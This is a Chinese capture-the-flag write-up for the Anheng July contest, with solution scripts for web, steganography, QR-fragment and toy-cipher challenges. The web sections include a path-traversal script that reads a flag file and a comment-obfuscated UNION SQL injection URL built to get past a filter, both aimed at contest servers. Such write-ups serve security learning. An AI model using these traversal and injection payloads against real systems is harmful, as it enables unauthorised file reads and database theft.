安恒7月赛wp整理

啊这, 这波是预判失误,以为时间短能来点阳间题,结果比六月海阴间,qswl

web1:

这题差点出,卡在waf过滤的../ 彳亍口巴,反正就是很简单的一道题(老诸葛亮了)

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
import requests as req
import base64 as b
import time as t
from urllib.parse import quote_plus as urlen

HOST = "http://183.129.189.60:10009/image.php?t={}&f=".format(int(t.time()))
file = 'y1ng/../../../../../../../flag'
file = b.b64encode(file.encode("utf-8")).decode("utf-8")
url = HOST+urlen(file)
print(req.get(url).text)

web2:

正则过滤,过滤一堆堆

以为联合注入,结果是个布尔盲注,然而好像联合也能出,结束后构筑出来了,没提交上.jpg

http://183.129.189.60:10004/?id=1%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

misc1:

挺阴间的一道题.jpg要不是被提示是ntfs隐写,我可能都把压缩包吃了

开局一个压缩包一个red_blue.png图片

red_bule 脑测是lsb隐写,

然后可以提取出图片一张

输入后解压flag.zip 出现如下两个文件

卡这卡半天,winhex看hint.png最后一行base64加密 以此解密后得到提示:

?jpg跟base85有啥关系、、?

请教了一下神大人,是ntfs隐写,啊这,

直接提出来

base85解密即可

WEB2:

一个gif,总共64张二维码碎片,

由于是纯体力活,这题我就懒得做了

直接贴一下神大人的一把梭脚本,

from PIL import Image
from Crypto.Util import number
import base64

dic = {0:'0',1:'1',2:'2',3:'3',4:'4',5:'5',6:'6',7:'7',8:'8',9:'9',10:'A',11:'B',12:'C',13:'D',14:'E',15:'F',38:'%'}
res = ''
for num in range(64):
    p = Image.open('frame'+str(num+1)+'.bmp')
    a,b = p.size
    # print(a)
    data = []
    for y in range(100,b-10,10):
        d = []
        for x in range(410,470,10):
            if (y//10)%2 == 0:
                if p.getpixel((x,y)) >= 200:
                    d.append('1')
                else:
                    d.append('0')
            else:
                if p.getpixel((x,y)) >= 200:
                    d.append('0')
                else:
                    d.append('1')
        data.append(d)
    mode = data[11][5]+data[11][4]+data[10][5]+data[10][4]
    # print(mode)
    length = data[9][5]+data[9][4]+data[8][5]+data[8][4]+data[7][5]+data[7][4]+data[6][5]+data[6][4]+data[5][5]
    # print(length)
    d1 = data[5][4]+data[4][5]+data[4][4]+data[3][5]+data[3][4]+data[2][5]+data[2][4]
    d2 = data[1][5]+data[1][4]+data[0][5]+data[0][4]+data[0][3]+data[0][2]+data[1][3]+data[1][2]
    d3 = data[2][3]+data[2][2]+data[3][3]+data[3][2]+data[4][3]+data[4][2]+data[5][3]+data[5][2]
    d4 = data[6][3]+data[6][2]+data[7][3]+data[7][2]+data[8][3]+data[8][2]+data[9][3]+data[9][2]
    d5 = data[10][3]+data[10][2]+data[11][3]+data[11][2]+data[11][1]+data[11][0]+data[10][1]+data[10][0]
    d6 = data[9][1]+data[9][0]+data[8][1]+data[8][0]+data[7][1]+data[7][0]+data[6][1]+data[6][0]+data[5][1]
    d = d1+d2+d3+d4+d5+d6
    fin = d[:33]
    for i in range(0,len(fin),11):
        y = int(fin[i:i+11],2)%45
        x = int(fin[i:i+11],2)//45
        res += dic[x] + dic[y]
b64_data = number.long_to_bytes(int(res.replace('%',''),16))
while 1:
    b64_data = base64.b64decode(b64_data)
    if b'flag' in b64_data:
        print(b64_data)
        break

密码1:

源代码:

from flag import flag
def pairing(a,b):
    shell = max(a, b)
    step = min(a, b)
    if step == b:
        flag = 0
    else:
        flag = 1
    return shell ** 2 + step * 2 + flag

def encrypt(message):
    res = ''
    for i in range(0,len(message),2):
        res += str(pairing(message[i],message[i+1]))
    return res

print(encrypt(flag))
# 1186910804152291019933541010532411051999082499105051010395199519323297119520312715722

由于过于简单直接贴脚本了,告辞。

flag = '1186910804152291019933541010532411051999082499105051010395199519323297119520312715722'
flag = '1186910804152291019933541010532411051999082499105051010395199519323297119520312715722'
_flag = ''
i = 0
while i <= len(flag):
    a = flag[i:i+5]
    # print('try 4')
    a = int(a)
    ok = False
    for j in range(33, 127):
        for k in range(33, 127):
            if j >= k and j ** 2 + k * 2 == a:
                _flag += chr(j) + chr(k)
                ok = True
                i += 5
                print(_flag)
                print(a)
                break
            elif j < k and k ** 2 + j * 2 + 1 == a:
                _flag += chr(j) + chr(k)
                ok = True
                i += 5
                print(_flag)
                print(a)
                break
        if ok:
            break
    if ok != True:
        # print('try 5')
        a = flag[i:i + 4]
        a = int(a)
        ok = False
        for j in range(33, 127):
            for k in range(33, 127):
                if j >= k and j ** 2 + k * 2 == a:
                    _flag += chr(j) + chr(k)
                    ok = True
                    i += 4
                    print(_flag)
                    print(a)
                    break
                elif j < k and k ** 2 + j * 2 + 1 == a:
                    _flag += chr(j) + chr(k)
                    ok = True
                    i += 4
                    print(_flag)
                    print(a)
                    break
        if ok != True:
            print('not ok')
            print(a)
            exit(0)

# flag{2cd944d849fc5112f3d7a7a08b5a7370}
print(_flag)

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发